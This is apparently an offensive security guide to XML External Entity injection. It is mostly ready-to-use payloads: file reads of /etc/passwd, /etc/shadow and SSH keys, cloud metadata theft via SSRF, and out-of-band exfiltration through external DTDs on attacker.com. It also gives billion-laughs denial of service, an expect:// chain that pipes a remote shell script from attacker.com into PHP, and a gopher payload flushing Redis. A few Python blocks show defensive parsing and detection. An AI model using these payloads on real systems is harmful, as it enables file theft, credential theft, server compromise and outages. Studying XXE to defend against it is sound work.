This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

XML injection (XXE - XML External Entity)

What is XXE Injection?

XML External Entity (XXE) injection is a vulnerability that occurs when an XML parser processes external entity references in XML documents without proper validation. This allows attackers to access local files, perform SSRF attacks, cause denial of service, or execute remote code in some cases.

Vulnerable Code Example

// PHP vulnerable XML processing
$xml_data = $_POST['xml'];  // untrusted: the client controls the whole document, DOCTYPE included
// Vulnerable: libxml with external entities enabled
$dom = new DOMDocument();
$dom->loadXML($xml_data);
// External entities processed by default
$xpath = new DOMXPath($dom);
$result = $xpath->query('//user/name');
// Whatever the entity expanded to (e.g. file contents) is reflected back to the client
echo "User: " . $result->item(0)->nodeValue;

Normal XML Request:

<?xml version="1.0"?>
<user>
    <name>John</name>
    <email>john@example.com</email>
</user>

Malicious XXE Request:

<?xml version="1.0"?>
<!DOCTYPE user [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
    <name>&xxe;</name>
    <email>john@example.com</email>
</user>

How XXE Injection Works

XXE exploits the XML parser's ability to process Document Type Definitions (DTDs) and external entities. When external entity processing is enabled, attackers can define malicious entities that reference local files, network resources, or other XML documents.
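A hardened counterpart to the vulnerable PHP handler above, added here as an example in Python rather than taken from the guide: it refuses any DOCTYPE, entity declaration or external reference before the parser reaches the entity, and otherwise returns the same /user/name value the PHP code echoes. The two sample requests are the normal and malicious documents shown above; the function names are my own.

```python
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """The request carried a DTD, an entity declaration or an external reference."""


def _reject(reason):
    def handler(*_args):
        raise UnsafeXmlError(reason)
    return handler


def parse_user_name(xml_bytes):
    """Return the text of /user/name, the value the PHP handler above echoes back."""
    parser = expat.ParserCreate()
    # A legitimate request never needs a DTD, so refuse every DOCTYPE instead
    # of trying to tell harmless entity declarations from malicious ones.
    parser.StartDoctypeDeclHandler = _reject("DOCTYPE is not accepted")
    parser.EntityDeclHandler = _reject("entity declarations are not accepted")
    # expat never fetches external entities itself; an application would do so
    # from this handler, so pin it to something that can only fail.
    parser.ExternalEntityRefHandler = _reject("external entities are not accepted")

    path = []        # element names from the root down to the current element
    collected = []   # character data seen inside /user/name

    def start(tag, _attrs):
        path.append(tag)

    def end(_tag):
        path.pop()

    def chars(data):
        if path == ["user", "name"]:
            collected.append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_bytes, True)
    if not collected:
        raise ValueError("request has no /user/name element")
    return "".join(collected)


def is_accepted(xml_bytes):
    """True when the document parses without tripping any of the XXE guards."""
    try:
        parse_user_name(xml_bytes)
        return True
    except UnsafeXmlError:
        return False


# Constructed samples: the normal and the malicious request shown above.
NORMAL_REQUEST = b'<?xml version="1.0"?><user><name>John</name><email>john@example.com</email></user>'
XXE_REQUEST = (b'<?xml version="1.0"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
               b'<user><name>&xxe;</name><email>john@example.com</email></user>')
```

The malicious request is refused at the `<!DOCTYPE` token, before expat has read the internal subset, so the entity is never declared, let alone resolved.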

XML Entity Types

Internal Entities:

<!DOCTYPE doc [
    <!ENTITY internal "Internal Entity Value">
]>
<doc>&internal;</doc>

External Entities:

<!DOCTYPE doc [
    <!ENTITY external SYSTEM "file:///etc/passwd">
]>
<doc>&external;</doc>

Parameter Entities:

<!DOCTYPE doc [
    <!ENTITY % param "value">
    %param;
]>

General vs Parameter Entities:

  • General entities: &entityname; - Used in document content

  • Parameter entities: %entityname; - Used in DTD definitions

Impact and Consequences

  • Local File Disclosure - Reading sensitive system files

  • Server-Side Request Forgery (SSRF) - Making requests to internal services

  • Denial of Service - Billion laughs attack, recursive entity expansion

  • Remote Code Execution - In specific configurations (expect://, PHP wrappers)

  • Information Disclosure - Extracting configuration files, source code

  • Port Scanning - Discovering internal network services

XML Parser Behavior and Detection

Common XML Parsers

PHP Parsers:

  • DOMDocument - Default: External entities enabled

  • SimpleXML - Default: External entities disabled (PHP 5.6+)

  • XMLReader - Default: External entities enabled

Java Parsers:

  • DocumentBuilderFactory - Default: External entities enabled

  • SAXParserFactory - Default: External entities enabled

  • XMLInputFactory (StAX) - Default: External entities enabled

  • TransformerFactory - Default: External entities enabled

Python Parsers:

  • xml.etree.ElementTree - Default: External entities disabled

  • xml.dom.minidom - Default: External entities disabled

  • lxml - Default: External entities disabled

  • xml.sax - Default: External entities disabled

JavaScript/Node.js Parsers:

  • libxmljs - Default: External entities enabled

  • xmldom - Default: External entities enabled

  • xml2js - Default: External entities disabled

Detection Methodology

Basic Entity Detection:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY test "XXE_DETECTED">
]>
<root>
    <data>&test;</data>
</root>

File Reading Detection:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>
    <data>&xxe;</data>
</root>

HTTP Request Detection:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY xxe SYSTEM "http://attacker.com/xxe_test">
]>
<root>
    <data>&xxe;</data>
</root>

Basic XXE Exploitation Techniques

Local File Disclosure

Direct File Reading

Reading System Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>
    <content>&file;</content>
</data>

Reading Configuration Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY config SYSTEM "file:///etc/apache2/apache2.conf">
]>
<data>
    <content>&config;</content>
</data>

Reading Application Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY app SYSTEM "file:///var/www/html/config.php">
]>
<data>
    <content>&app;</content>
</data>

Windows File System Access

Reading Windows System Files:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<data>
    <content>&file;</content>
</data>

Reading IIS Configuration:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY iis SYSTEM "file:///C:/inetpub/wwwroot/web.config">
]>
<data>
    <content>&iis;</content>
</data>

Reading Application Data:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY app SYSTEM "file:///C:/Program Files/Application/config.xml">
]>
<data>
    <content>&app;</content>
</data>

Environment-Specific Paths

Common Linux Paths:

<!-- System Information -->
<!ENTITY system SYSTEM "file:///proc/version">
<!ENTITY cpuinfo SYSTEM "file:///proc/cpuinfo">
<!ENTITY meminfo SYSTEM "file:///proc/meminfo">

<!-- Network Configuration -->
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY resolv SYSTEM "file:///etc/resolv.conf">
<!ENTITY network SYSTEM "file:///etc/network/interfaces">

<!-- User Information -->
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY shadow SYSTEM "file:///etc/shadow">
<!ENTITY group SYSTEM "file:///etc/group">

<!-- SSH Configuration -->
<!ENTITY sshd_config SYSTEM "file:///etc/ssh/sshd_config">
<!ENTITY ssh_host_key SYSTEM "file:///etc/ssh/ssh_host_rsa_key">

<!-- Log Files -->
<!ENTITY auth_log SYSTEM "file:///var/log/auth.log">
<!ENTITY syslog SYSTEM "file:///var/log/syslog">
<!ENTITY apache_log SYSTEM "file:///var/log/apache2/access.log">

Common Windows Paths:

<!-- System Information -->
<!ENTITY boot SYSTEM "file:///C:/boot.ini">
<!ENTITY hosts SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">

<!-- IIS Configuration -->
<!ENTITY iis_config SYSTEM "file:///C:/inetpub/wwwroot/web.config">
<!ENTITY machine_config SYSTEM "file:///C:/Windows/Microsoft.NET/Framework64/v4.0.30319/Config/machine.config">

<!-- Application Files -->
<!ENTITY app_config SYSTEM "file:///C:/inetpub/wwwroot/App_Data/database.config">
<!ENTITY connection_strings SYSTEM "file:///C:/inetpub/wwwroot/connectionStrings.config">

<!-- User Profiles -->
<!ENTITY user_profile SYSTEM "file:///C:/Users/Administrator/Desktop/passwords.txt">
<!ENTITY documents SYSTEM "file:///C:/Users/Administrator/Documents/sensitive.doc">

Server-Side Request Forgery (SSRF)

Internal Network Scanning

Port Scanning:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY ssrf SYSTEM "http://192.168.1.1:80/">
]>
<data>
    <content>&ssrf;</content>
</data>

Service Discovery:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY mysql SYSTEM "http://localhost:3306/">
    <!ENTITY redis SYSTEM "http://localhost:6379/">
    <!ENTITY mongo SYSTEM "http://localhost:27017/">
    <!ENTITY elastic SYSTEM "http://localhost:9200/">
]>
<data>
    <mysql>&mysql;</mysql>
    <redis>&redis;</redis>
    <mongo>&mongo;</mongo>
    <elastic>&elastic;</elastic>
</data>

Internal API Access:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY api SYSTEM "http://internal-api.company.com/admin/users">
]>
<data>
    <content>&api;</content>
</data>

Cloud Metadata Access

AWS Metadata Service:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>
    <content>&aws;</content>
</data>

Google Cloud Metadata:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<data>
    <content>&gcp;</content>
</data>

Azure Metadata Service:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY azure SYSTEM "http://169.254.169.254/metadata/instance/compute/azEnvironment?api-version=2021-02-01">
]>
<data>
    <content>&azure;</content>
</data>

Protocol Exploitation

FTP Protocol:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY ftp SYSTEM "ftp://internal-ftp.company.com:21/">
]>
<data>
    <content>&ftp;</content>
</data>

LDAP Protocol:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY ldap SYSTEM "ldap://internal-ldap.company.com:389/dc=company,dc=com">
]>
<data>
    <content>&ldap;</content>
</data>

Gopher Protocol (if supported):

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY gopher SYSTEM "gopher://localhost:6379/_*1%0d%0a$4%0d%0ainfo%0d%0a">
]>
<data>
    <content>&gopher;</content>
</data>

Advanced XXE Exploitation

Blind XXE Exploitation

Out-of-Band Data Exfiltration

Basic Out-of-Band XXE:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/collect.php?data=%file;'>">
    %eval;
    %exfiltrate;
]>
<data>test</data>

Parameter Entity Chaining:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
    %remote;
]>
<data>test</data>

External DTD (evil.dtd on attacker server):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/collect.php?data=%file;'>">
%eval;
%exfiltrate;

Error-Based Blind XXE

XML Parse Error Exploitation:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
    %eval;
    %error;
]>
<data>test</data>

Invalid URI Error:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://nonexistent.%file;.attacker.com/'>">
    %eval;
    %error;
]>
<data>test</data>

Time-Based Blind XXE

Slow External Resource:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY slow SYSTEM "http://slow-server.attacker.com/delay.php?time=10">
]>
<data>&slow;</data>

Conditional Time Delays:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % condition SYSTEM "file:///etc/passwd">
    <!ENTITY % delay "<!ENTITY &#x25; slow SYSTEM 'http://attacker.com/slow.php?exists=%condition;'>">
    %delay;
    %slow;
]>
<data>test</data>

XXE with Parameter Entities

Complex Parameter Entity Attacks

Nested Parameter Entities:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % param1 "<!ENTITY &#x25; param2 '<!ENTITY &#x26;#x25; param3 SYSTEM &#x22;file:///etc/passwd&#x22;>'>">
    %param1;
    %param2;
    %param3;
]>
<data>&param3;</data>

Parameter Entity with External DTD:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % external SYSTEM "http://attacker.com/external.dtd">
    %external;
    %all;
]>
<data>&send;</data>

External DTD with Data Exfiltration:

<!-- external.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/collect.php?data=%file;'>">

UTF-16 Encoding Bypass

UTF-16BE Encoded XXE:

<?xml version="1.0" encoding="UTF-16BE"?>
<!DOCTYPE data [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

UTF-16LE Encoded XXE:

<?xml version="1.0" encoding="UTF-16LE"?>
<!DOCTYPE data [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
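An added example, not part of the original guide, for the defensive side of the Detection Methodology probes and of the UTF-16 bypass above: a request-body scanner a gateway or log pipeline can run, which decodes the body (sniffing UTF-16 with or without a BOM) before looking for DOCTYPE, entity and risky-scheme indicators. The indicator and function names are mine; the samples are this page's normal request and file-reading probe, plus the probe re-encoded as UTF-16BE.

```python
import codecs
import re

# Indicators checked against the decoded body, reported in this order.
INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE\b", re.I)),
    ("entity-declaration", re.compile(r"<!ENTITY\b", re.I)),
    ("external-entity", re.compile(r"<!ENTITY\s+(%\s+)?[\w.:-]+\s+(SYSTEM|PUBLIC)\b", re.I)),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%", re.I)),
    ("risky-scheme", re.compile(r"\b(file|php|expect|gopher|jar|netdoc|ftp|ldap)://", re.I)),
    ("cloud-metadata", re.compile(r"169\.254\.169\.254|metadata\.google\.internal", re.I)),
]


def decode_xml_body(body):
    """Decode a body the way an XML parser would and say which encoding family it used.

    A byte-level search for b"<!DOCTYPE" never matches UTF-16 input, which is
    exactly what the encoding bypass above relies on: decode first, then match.
    """
    if body[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
        return body.decode("utf-16", errors="replace"), "utf-16"
    if body[:2] == b"<\x00":      # '<' in UTF-16LE without a BOM
        return body.decode("utf-16-le", errors="replace"), "utf-16"
    if body[:2] == b"\x00<":      # '<' in UTF-16BE without a BOM
        return body.decode("utf-16-be", errors="replace"), "utf-16"
    if body.startswith(codecs.BOM_UTF8):
        body = body[len(codecs.BOM_UTF8):]
    return body.decode("utf-8", errors="replace"), "utf-8"


def scan_xml_body(body):
    """Return the indicator names found in the body; an empty list means nothing seen."""
    text, family = decode_xml_body(body)
    findings = [name for name, pattern in INDICATORS if pattern.search(text)]
    if family == "utf-16" and findings:
        # UTF-16 is legal XML, so only report it alongside another indicator.
        findings.append("utf-16-encoded")
    return findings


# Constructed samples: the normal request and the file-reading probe from this
# page, plus the same probe re-encoded as UTF-16BE.
NORMAL_REQUEST = b'<?xml version="1.0"?><user><name>John</name><email>john@example.com</email></user>'
PROBE_TEXT = ('<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
              '<root><data>&xxe;</data></root>')
FILE_PROBE = PROBE_TEXT.encode("utf-8")
UTF16BE_PROBE = PROBE_TEXT.replace('"1.0"?>', '"1.0" encoding="UTF-16BE"?>').encode("utf-16-be")
```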

Protocol Handler Exploitation

PHP Wrapper Exploitation

PHP Filter for Base64 Encoding:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<data>&file;</data>

PHP Input Stream:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY input SYSTEM "php://input">
]>
<data>&input;</data>

PHP Expect Wrapper (if enabled):

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY cmd SYSTEM "expect://whoami">
]>
<data>&cmd;</data>

Data URI Exploitation

Data URI with Base64:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY b64 SYSTEM "data:text/plain;base64,SGVsbG8gV29ybGQ=">
]>
<data>&b64;</data>

Data URI with URL Encoding:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY encoded SYSTEM "data:text/plain,Hello%20World">
]>
<data>&encoded;</data>

Java-Specific Protocol Handlers

jar:// Protocol:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY jar SYSTEM "jar:file:///path/to/archive.jar!/META-INF/MANIFEST.MF">
]>
<data>&jar;</data>

netdoc:// Protocol (Java):

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY netdoc SYSTEM "netdoc:///etc/passwd">
]>
<data>&netdoc;</data>

Denial of Service Attacks

Billion Laughs Attack

Exponential Entity Expansion

Classic Billion Laughs:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY lol "lol">
    <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<data>&lol9;</data>

Optimized Expansion Attack:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">
    <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
    <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
    <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
    <!ENTITY e "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
]>
<data>&e;</data>

Quadratic Blowup Attack

Large Entity Repetition:

The quadratic blowup attack involves creating a very large entity (thousands of characters) and then referencing it many times within the XML document. Memory consumption grows with the entity size multiplied by the number of references (hence "quadratic"), because the parser expands every reference in full. Create an entity with 10,000+ repetitive characters, then reference it 1,000+ times in the document content.

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY huge "AAAA[...repeat A 10,000 times...]AAAA">
]>
<data>
    &huge;&huge;&huge;[...repeat &huge; 1000+ times...]&huge;
</data>
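An added example, not from the original guide, covering both the billion laughs and the quadratic blowup documents above: it estimates the fully expanded size from the entity declarations using expat with expansion switched off, so the check itself never allocates the expanded text. The sample documents are constructed here to match the shapes shown, and the function names are mine.

```python
import re
import xml.parsers.expat as expat

ENTITY_REF = re.compile(r"&([^;&\s]+);")
PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}   # each expands to one character


def estimate_expansion(xml_bytes):
    """Return (expanded content chars, {entity: expanded chars}) without expanding anything."""
    literals = {}   # internal general entities: name -> replacement text
    sizes = {}      # memoised fully expanded size per entity, computed from the declarations
    content = [0]   # expanded character count of the document content

    def expanded_size(name, chain=()):
        if name in PREDEFINED:
            return 1
        if name in sizes:
            return sizes[name]
        if name in chain:
            raise ValueError("recursive entity: " + name)
        value = literals.get(name)
        if value is None:   # undeclared or external: nothing expands locally
            return 0
        total = pos = 0
        for m in ENTITY_REF.finditer(value):
            total += m.start() - pos
            ref = m.group(1)
            total += 1 if ref.startswith("#") else expanded_size(ref, chain + (name,))
            pos = m.end()
        sizes[name] = total + len(value) - pos
        return sizes[name]

    def on_entity_decl(name, is_parameter, value, _base, _sysid, _pubid, _notation):
        if not is_parameter and value is not None:
            literals[name] = value

    def on_chars(data):
        content[0] += len(data)

    def on_skipped(name, _is_parameter):
        # Reached only because DefaultHandler is set: expat then reports each
        # internal entity reference in content instead of substituting it.
        content[0] += expanded_size(name)

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.CharacterDataHandler = on_chars
    parser.DefaultHandler = lambda _data: None   # side effect: entity expansion is switched off
    parser.SkippedEntityHandler = on_skipped
    parser.Parse(xml_bytes, True)
    return content[0], sizes


def expansion_within_limit(xml_bytes, limit=1_000_000):
    """True when fully expanding the document would stay within `limit` characters."""
    try:
        total, sizes = estimate_expansion(xml_bytes)
    except ValueError:   # recursive entity chain
        return False
    return total <= limit and max(sizes.values(), default=0) <= limit


# Constructed documents shaped like the two attacks above, plus one benign internal entity.
BILLION_LAUGHS = ('<?xml version="1.0"?><!DOCTYPE data [<!ENTITY lol1 "lol">'
                  + "".join('<!ENTITY lol%d "%s">' % (i, ("&lol%d;" % (i - 1)) * 10) for i in range(2, 10))
                  + "]><data>&lol9;</data>").encode()
QUADRATIC = ('<?xml version="1.0"?><!DOCTYPE data [<!ENTITY huge "%s">]><data>%s</data>'
             % ("A" * 10_000, "&huge;" * 1000)).encode()
BENIGN = b'<?xml version="1.0"?><!DOCTYPE data [<!ENTITY org "Example Corp">]><data>&org; welcomes you</data>'
```

The nine-level document reports 300,000,000 characters and the 10,000-by-1,000 document 10,000,000, both well above the default limit, while the benign DTD stays at a few dozen.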

External Resource Exhaustion

Slow Loris Attack

Slow External Resource Loading:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY slow1 SYSTEM "http://slow-server.attacker.com/delay?time=30">
    <!ENTITY slow2 SYSTEM "http://slow-server.attacker.com/delay?time=30">
    <!ENTITY slow3 SYSTEM "http://slow-server.attacker.com/delay?time=30">
]>
<data>
    &slow1;&slow2;&slow3;
</data>

Multiple Concurrent Requests:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY req1 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req2 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req3 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req4 SYSTEM "http://target-internal.com/large-resource">
    <!ENTITY req5 SYSTEM "http://target-internal.com/large-resource">
]>
<data>
    &req1;&req2;&req3;&req4;&req5;
</data>

Recursive Entity Loading

Infinite External Entity Loop:

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY % recursive SYSTEM "http://attacker.com/recursive.dtd">
    %recursive;
]>
<data>test</data>

Recursive DTD (recursive.dtd):

<!ENTITY % recursive SYSTEM "http://attacker.com/recursive.dtd">
%recursive;

XXE in Different Application Contexts

Web Services and APIs

SOAP Web Services

SOAP Envelope XXE:

<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <getUserInfo>
            <username>&xxe;</username>
        </getUserInfo>
    </soap:Body>
</soap:Envelope>

WSDL File XXE:

<?xml version="1.0"?>
<!DOCTYPE definitions [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/">
    <documentation>&xxe;</documentation>
</definitions>

REST API with XML Content

XML Payload in REST:

POST /api/users HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE user [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
    <name>&xxe;</name>
    <email>test@example.com</email>
</user>

RSS Feed Processing:

<?xml version="1.0"?>
<!DOCTYPE rss [
    <!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
]>
<rss version="2.0">
    <channel>
        <title>News Feed</title>
        <description>&xxe;</description>
    </channel>
</rss>

File Upload and Processing

Document Upload XXE

Microsoft Office Document XXE:

<!-- In document.xml within .docx file -->
<?xml version="1.0"?>
<!DOCTYPE document [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
    <w:body>
        <w:p>
            <w:r>
                <w:t>&xxe;</w:t>
            </w:r>
        </w:p>
    </w:body>
</w:document>

SVG File XXE:

<?xml version="1.0"?>
<!DOCTYPE svg [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
    <text>&xxe;</text>
</svg>

Android APK Manifest XXE:

<?xml version="1.0"?>
<!DOCTYPE manifest [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:label="&xxe;">
    </application>
</manifest>

Configuration File Processing

XML Configuration Files:

<?xml version="1.0"?>
<!DOCTYPE config [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<config>
    <database>
        <host>&xxe;</host>
        <username>admin</username>
    </database>
</config>

Spring Bean Configuration:

<?xml version="1.0"?>
<!DOCTYPE beans [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<beans xmlns="http://www.springframework.org/schema/beans">
    <bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource">
        <property name="url" value="&xxe;"/>
    </bean>
</beans>

Content Management Systems

WordPress XML-RPC

XML-RPC Method Call:

<?xml version="1.0"?>
<!DOCTYPE methodCall [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<methodCall>
    <methodName>system.listMethods</methodName>
    <params>
        <param>
            <value>
                <string>&xxe;</string>
            </value>
        </param>
    </params>
</methodCall>

Drupal XML Processing

Drupal Feed Import:

<?xml version="1.0"?>
<!DOCTYPE rdf:RDF [
    <!ENTITY xxe SYSTEM "file:///var/www/drupal/sites/default/settings.php">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
    <item>
        <title>&xxe;</title>
    </item>
</rdf:RDF>

XXE in Mobile Applications

Android Application XXE

XML Parsing in Android

Android XML Parser XXE:

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///system/etc/hosts">
]>
<root>
    <data>&xxe;</data>
</root>

Android Layout XML:

<?xml version="1.0"?>
<!DOCTYPE LinearLayout [
    <!ENTITY xxe SYSTEM "file:///data/data/com.app.package/shared_prefs/preferences.xml">
]>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android">
    <TextView android:text="&xxe;" />
</LinearLayout>

iOS Application XXE

iOS Plist Processing:

<?xml version="1.0"?>
<!DOCTYPE plist [
    <!ENTITY xxe SYSTEM "file:///private/var/mobile/Library/Preferences/com.app.plist">
]>
<plist version="1.0">
    <dict>
        <key>data</key>
        <string>&xxe;</string>
    </dict>
</plist>

Advanced Exploitation Scenarios

Multi-Stage XXE Attacks

XXE to RCE Chain

Stage 1: File Discovery

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY file SYSTEM "file:///etc/crontab">
]>
<data>&file;</data>

Stage 2: Configuration Extraction

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY config SYSTEM "file:///var/www/html/config.php">
]>
<data>&config;</data>

Stage 3: Remote Code Execution (if PHP expect enabled)

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY rce SYSTEM "expect://curl http://attacker.com/shell.php | php">
]>
<data>&rce;</data>

XXE to SSRF to Internal Network Compromise

Stage 1: Internal Network Discovery

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY scan SYSTEM "http://192.168.1.1:22/">
]>
<data>&scan;</data>

Stage 2: Service Enumeration

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY redis SYSTEM "http://192.168.1.100:6379/">
]>
<data>&redis;</data>

Stage 3: Service Exploitation via Gopher

<?xml version="1.0"?>
<!DOCTYPE data [
    <!ENTITY exploit SYSTEM "gopher://192.168.1.100:6379/_*1%0d%0a$8%0d%0aFLUSHALL%0d%0a">
]>
<data>&exploit;</data>
